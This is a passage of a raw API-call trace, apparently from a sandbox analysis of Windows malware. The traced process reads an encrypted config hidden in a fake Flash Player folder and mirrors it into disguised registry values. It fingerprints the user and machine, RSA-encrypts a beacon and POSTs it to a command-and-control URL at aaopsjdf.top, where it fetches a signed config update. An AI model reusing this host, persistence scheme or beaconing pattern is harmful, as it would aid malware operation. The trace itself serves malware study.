Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" [0312.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x271f3d4, cbMultiByte=85, lpWideCharStr=0x271f068, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rigɱ霰\x08ɱ茶癦霰\x08\x1c绻") returned 85 [0312.961] PathCombineW (in: pszDest=0x89748, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" [0312.961] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x271f484 | out: phkResult=0x271f484*=0x108) returned 0x0 [0312.961] RegQueryValueExW (in: hKey=0x108, lpValueName="Omegovna", lpReserved=0x0, lpType=0x271f4b0, lpData=0x0, lpcbData=0x271f498*=0x0 | out: lpType=0x271f4b0*=0x0, lpData=0x0, lpcbData=0x271f498*=0x0) returned 0x2 [0312.961] RegCloseKey (hKey=0x108) returned 0x0 [0312.961] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x110 [0312.973] GetFileSizeEx (in: hFile=0x110, lpFileSize=0x271f488 | out: lpFileSize=0x271f488*=1776) returned 1 [0312.980] VirtualAlloc (lpAddress=0x0, dwSize=0x6f0, flAllocationType=0x3000, flProtect=0x4) returned 0x120000 [0313.025] ReadFile (in: hFile=0x110, lpBuffer=0x120000, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x271f498, lpOverlapped=0x0 | out: lpBuffer=0x120000*, lpNumberOfBytesRead=0x271f498*=0x6f0, lpOverlapped=0x0) returned 1 [0313.025] VirtualFree (lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0313.028] CloseHandle (hObject=0x110) returned 1 [0313.030] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="4D") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="A3") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="8C") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="1F") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="12") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="D1") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="89") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="46") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="B1") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="7E") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="A3") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="A6") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="54") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="25") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="90") returned 2 [0313.030] wvnsprintfW (in: pszDest=0x271f2a8, cchDest=3, pszFmt="%02X", arglist=0x271f284 | out: pszDest="59") returned 2 [0313.030] CreateEventW (lpEventAttributes=0x877e4, bManualReset=0, bInitialState=0, lpName="4DA38C1F12D18946B17EA3A654259059") returned 0x110 [0313.030] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0x0) returned 0x102 [0313.030] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="AB") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="C6") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="B5") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="B7") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="74") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="FF") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="9F") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="D7") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="F5") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="4E") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="C2") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="77") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="09") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="8C") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="64") returned 2 [0313.031] wvnsprintfW (in: pszDest=0x271de40, cchDest=3, pszFmt="%02X", arglist=0x271de1c | out: pszDest="EE") returned 2 [0313.031] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x188 [0313.031] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0xffffffff) returned 0x0 [0313.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x271dd42, cbMultiByte=6, lpWideCharStr=0x89b20, cchWideChar=10 | out: lpWideCharStr="Acuhci") returned 6 [0313.031] PathCombineW (in: pszDest=0x89a68, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0313.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x271dd60, cbMultiByte=9, lpWideCharStr=0x89b20, cchWideChar=10 | out: lpWideCharStr="Baywkivyl") returned 9 [0313.031] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x271dd60 | out: phkResult=0x271dd60*=0x18c) returned 0x0 [0313.031] RegQueryValueExW (in: hKey=0x18c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x271dd8c, lpData=0x0, lpcbData=0x271dd74*=0x0 | out: lpType=0x271dd8c*=0x3, lpData=0x0, lpcbData=0x271dd74*=0x6f0) returned 0x0 [0313.031] RegQueryValueExW (in: hKey=0x18c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x271dd8c, lpData=0x235cb58, lpcbData=0x271dd74*=0x6f0 | out: lpType=0x271dd8c*=0x3, lpData=0x235cb58*, lpcbData=0x271dd74*=0x6f0) returned 0x0 [0313.031] RegCloseKey (hKey=0x18c) returned 0x0 [0313.031] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x271e024 | out: phkResult=0x271e024*=0x18c) returned 0x0 [0313.031] RegQueryValueExW (in: hKey=0x18c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x271e050, lpData=0x0, lpcbData=0x271e038*=0x0 | out: lpType=0x271e050*=0x0, lpData=0x0, lpcbData=0x271e038*=0x0) returned 0x2 [0313.032] RegCloseKey (hKey=0x18c) returned 0x0 [0313.032] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0313.032] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x271e028 | out: lpFileSize=0x271e028*=1776) returned 1 [0313.032] VirtualAlloc (lpAddress=0x0, dwSize=0x6f0, flAllocationType=0x3000, flProtect=0x4) returned 0x120000 [0313.032] ReadFile (in: hFile=0x18c, lpBuffer=0x120000, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x271e038, lpOverlapped=0x0 | out: lpBuffer=0x120000*, lpNumberOfBytesRead=0x271e038*=0x6f0, lpOverlapped=0x0) returned 1 [0313.032] VirtualFree (lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0313.032] CloseHandle (hObject=0x18c) returned 1 [0313.034] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x271dd74, lpdwDisposition=0x0 | out: phkResult=0x271dd74*=0x18c, lpdwDisposition=0x0) returned 0x0 [0313.034] RegSetValueExW (in: hKey=0x18c, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x235cb58*, cbData=0x6f0 | out: lpData=0x235cb58*) returned 0x0 [0313.034] RegCloseKey (hKey=0x18c) returned 0x0 [0313.034] ReleaseMutex (hMutex=0x188) returned 1 [0313.034] CloseHandle (hObject=0x188) returned 1 [0313.034] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x271e234 | out: phkResult=0x271e234*=0x188) returned 0x0 [0313.034] RegQueryValueExW (in: hKey=0x188, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x271e260, lpData=0x0, lpcbData=0x271e248*=0x0 | out: lpType=0x271e260*=0x3, lpData=0x0, lpcbData=0x271e248*=0x6f0) returned 0x0 [0313.034] RegQueryValueExW (in: hKey=0x188, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x271e260, lpData=0x235cb58, lpcbData=0x271e248*=0x6f0 | out: lpType=0x271e260*=0x3, lpData=0x235cb58*, lpcbData=0x271e248*=0x6f0) returned 0x0 [0313.034] RegCloseKey (hKey=0x188) returned 0x0 [0313.035] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1qesyozananrivoxityof.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x271ebc8 | out: lpUrlComponents=0x271ebc8) returned 1 [0313.218] GetSystemTime (in: lpSystemTime=0x271e878 | out: lpSystemTime=0x271e878*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x38, wSecond=0x2c, wMilliseconds=0x163)) [0313.218] SystemTimeToFileTime (in: lpSystemTime=0x271e878, lpFileTime=0x271e888 | out: lpFileTime=0x271e888) returned 1 [0313.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0313.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x235d498, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0313.218] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x271e900, nSize=0x271e8ac | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x271e8ac) returned 0x1 [0313.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0313.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x2350968, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YKYD69Q\\aETAdzjz", lpUsedDefaultChar=0x0) returned 16 [0313.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0313.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0x235d678, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DA064951B33C749DEEA4F9B0A440E075", lpUsedDefaultChar=0x0) returned 32 [0313.222] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x271e7fc | out: phkResult=0x271e7fc*=0x1fc) returned 0x0 [0313.222] RegQueryValueExW (in: hKey=0x1fc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x271e828, lpData=0x0, lpcbData=0x271e810*=0x0 | out: lpType=0x271e828*=0x0, lpData=0x0, lpcbData=0x271e810*=0x0) returned 0x2 [0313.222] RegCloseKey (hKey=0x1fc) returned 0x0 [0313.222] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0313.222] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x271e800 | out: lpFileSize=0x271e800*=1776) returned 1 [0313.222] VirtualAlloc (lpAddress=0x0, dwSize=0x6f0, flAllocationType=0x3000, flProtect=0x4) returned 0x150000 [0313.222] ReadFile (in: hFile=0x1fc, lpBuffer=0x150000, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x271e810, lpOverlapped=0x0 | out: lpBuffer=0x150000*, lpNumberOfBytesRead=0x271e810*=0x6f0, lpOverlapped=0x0) returned 1 [0313.222] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0313.222] CloseHandle (hObject=0x1fc) returned 1 [0313.223] wvnsprintfW (in: pszDest=0x271e8b4, cchDest=10, pszFmt="%u.%u.%u", arglist=0x271e88c | out: pszDest="2.6.1") returned 5 [0313.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0313.223] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x271ea6e, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x271e7d0, pcbStructInfo=0x271e7b4 | out: pvStructInfo=0x271e7d0, pcbStructInfo=0x271e7b4) returned 1 [0313.227] CryptImportPublicKeyInfo (in: hCryptProv=0x3de630, dwCertEncodingType=0x1, pInfo=0x3efd60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3efd90*, PublicKey.cbData=0x10d, PublicKey.pbData=0x3efd98*, PublicKey.cUnusedBits=0x0), phKey=0x271e7c0 | out: phKey=0x271e7c0*=0x3e9c50) returned 1 [0313.227] LocalFree (hMem=0x3efd60) returned 0x0 [0313.227] wvnsprintfA (in: pszDest=0x235c600, cchDest=21, pszFmt="%d", arglist=0x271e6d4 | out: pszDest="1515610604") returned 10 [0313.227] CryptEncrypt (in: hKey=0x3e9c50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x271e620*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x271e620*=0x100) returned 1 [0313.227] CryptEncrypt (in: hKey=0x3e9c50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x235d0a8*, pdwDataLen=0x271e634*=0x20, dwBufLen=0x100 | out: pbData=0x235d0a8*, pdwDataLen=0x271e634*=0x100) returned 1 [0313.228] CryptDestroyKey (hKey=0x3e9c50) returned 1 [0313.228] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1qesyozananrivoxityof.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x271e730 | out: lpUrlComponents=0x271e730) returned 1 [0313.228] wvnsprintfA (in: pszDest=0x238e378, cchDest=516, pszFmt="%s%s", arglist=0x271e768 | out: pszDest="https://aaopsjdf.top/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/") returned 57 [0313.228] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x271e728 | out: lpUrlComponents=0x271e728) returned 1 [0313.228] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x8a360, cbSize=0x271e75c | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", cbSize=0x271e75c) returned 0x0 [0313.233] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0313.235] InternetSetOptionA (hInternet=0xcc0008, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0313.235] InternetSetOptionA (hInternet=0xcc0008, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0313.236] InternetSetOptionA (hInternet=0xcc0008, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0313.236] InternetConnectA (hInternet=0xcc0008, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0014 [0313.237] HttpOpenRequestA (hConnect=0xcc0014, lpszVerb="POST", lpszObjectName="/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc0020 [0313.253] HttpSendRequestA (hRequest=0xcc0020, lpszHeaders="Connection: close\r\nùÐé8\x02\x01", dwHeadersLength=0x13, lpOptional=0x2351320, dwOptionalLength=0x2d8) returned 0 [0317.093] InternetQueryOptionA (in: hInternet=0xcc0020, dwOption=0x1f, lpBuffer=0x271e64c, lpdwBufferLength=0x271e650 | out: lpBuffer=0x271e64c, lpdwBufferLength=0x271e650) returned 1 [0317.093] InternetSetOptionA (hInternet=0xcc0020, dwOption=0x1f, lpBuffer=0x271e64c, dwBufferLength=0x4) returned 1 [0317.093] HttpSendRequestA (in: hRequest=0xcc0020, lpszHeaders="Connection: close\r\nùÐé8\x02\x01", dwHeadersLength=0x13, lpOptional=0x2351320*, dwOptionalLength=0x2d8 | out: lpOptional=0x2351320*) returned 1 [0318.310] HttpQueryInfoA (in: hRequest=0xcc0020, dwInfoLevel=0x20000013, lpBuffer=0x271e64c, lpdwBufferLength=0x271e650, lpdwIndex=0x0 | out: lpBuffer=0x271e64c*, lpdwBufferLength=0x271e650*=0x4, lpdwIndex=0x0) returned 1 [0318.310] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0318.310] InternetReadFile (in: hFile=0xcc0020, lpBuffer=0x2399950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x271e760 | out: lpBuffer=0x2399950*, lpdwNumberOfBytesRead=0x271e760*=0x1000) returned 1 [0318.311] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0318.311] InternetReadFile (in: hFile=0xcc0020, lpBuffer=0x239a950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x271e760 | out: lpBuffer=0x239a950*, lpdwNumberOfBytesRead=0x271e760*=0x698) returned 1 [0318.311] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0318.311] InternetReadFile (in: hFile=0xcc0020, lpBuffer=0x239afe8, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x271e760 | out: lpBuffer=0x239afe8*, lpdwNumberOfBytesRead=0x271e760*=0x0) returned 1 [0318.312] InternetCloseHandle (hInternet=0xcc0020) returned 1 [0318.312] InternetQueryOptionA (in: hInternet=0xcc0014, dwOption=0x15, lpBuffer=0x271e75c, lpdwBufferLength=0x271e758 | out: lpBuffer=0x271e75c, lpdwBufferLength=0x271e758) returned 1 [0318.312] InternetCloseHandle (hInternet=0xcc0014) returned 1 [0318.312] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0318.313] CryptImportKey (in: hProv=0x3de630, pbData=0x238e350, dwDataLen=0x120, hPubKey=0x0, dwFlags=0x0, phKey=0x271ebfc | out: phKey=0x271ebfc*=0x45b898) returned 1 [0318.313] CryptCreateHash (in: hProv=0x3de630, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x271ebf0 | out: phHash=0x271ebf0) returned 1 [0318.313] CryptHashData (hHash=0x45b718, pbData=0x239b2c8, dwDataLen=0x6f0, dwFlags=0x0) returned 1 [0318.313] CryptVerifySignatureW (hHash=0x45b718, pbSignature=0x238e350, dwSigLen=0x100, hPubKey=0x45b898, szDescription=0x0, dwFlags=0x0) returned 1 [0318.314] CryptDestroyHash (hHash=0x45b718) returned 1 [0318.314] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x271ebcc, lpdwDisposition=0x0 | out: phkResult=0x271ebcc*=0x324, lpdwDisposition=0x0) returned 0x0 [0318.314] RegSetValueExW (in: hKey=0x324, lpValueName="Omegovna", Reserved=0x0, dwType=0x3, lpData=0x239b2c8*, cbData=0x6f0 | out: lpData=0x239b2c8*) returned 0x0 [0318.314] RegCloseKey (hKey=0x324) returned 0x0 [0318.314] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x324 [0318.314] WriteFile (in: hFile=0x324, lpBuffer=0x239b2c8*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x271ebdc, lpOverlapped=0x0 | out: lpBuffer=0x239b2c8*, lpNumberOfBytesWritten=0x271ebdc*=0x6f0, lpOverlapped=0x0) returned 1 [0318.315] CloseHandle (hObject=0x324) returned 1 [0318.315] GetCurrentThread () returned 0xfffffffe [0318.315] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x271ebb4 | out: TokenHandle=0x271ebb4*=0x0) returned 0 [0318.315] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x271ebb4 | out: TokenHandle=0x271ebb4*=0x324) returned 1 [0318.315] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x271eba8 | out: lpLuid=0x271eba8*(LowPart=0x8, HighPart=0)) returned 1 [0318.315] AdjustTokenPrivileges (in: TokenHandle=0x324, DisableAllPrivileges=0, NewState=0x271eba4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0318.315] GetLastError () returned 0x514 [0318.315] CloseHandle (hObject=0x324) returned 1 [0318.315] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0318.316] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x333e890, lpbSaclPresent=0x271ebcc, pSacl=0x271ebd8, lpbSaclDefaulted=0x271ebd0 | out: lpbSaclPresent=0x271ebcc, pSacl=0x271ebd8, lpbSaclDefaulted=0x271ebd0) returned 1 [0318.316] SetNamedSecurityInfoW () returned 0x0 [0318.316] LocalFree (hMem=0x333e890) returned 0x0 [0318.316] GetNamedSecurityInfoW () returned 0x0 [0318.317] AllocateAndInitializeSid (in: pIdentifierAuthority=0x271eb98, nSubAuthorityCount=0x2, nSubAuthority0=0x2, nSubAuthority1=0x1, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x271eba8 | out: pSid=0x271eba8*=0x3ec6b0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0xf), SubAuthority=([0]=0x2, [1]=0x0))) returned 1 [0318.317] SetEntriesInAclW () returned 0x0 [0318.317] SetNamedSecurityInfoW () returned 0x0 [0318.317] LocalFree (hMem=0x42a210) returned 0x0 [0318.317] LocalFree (hMem=0x450198) returned 0x0 [0318.318] CryptDestroyKey (hKey=0x45b898) returned 1 [0318.318] CreateMutexW (lpMutexAttributes=0x877e4, 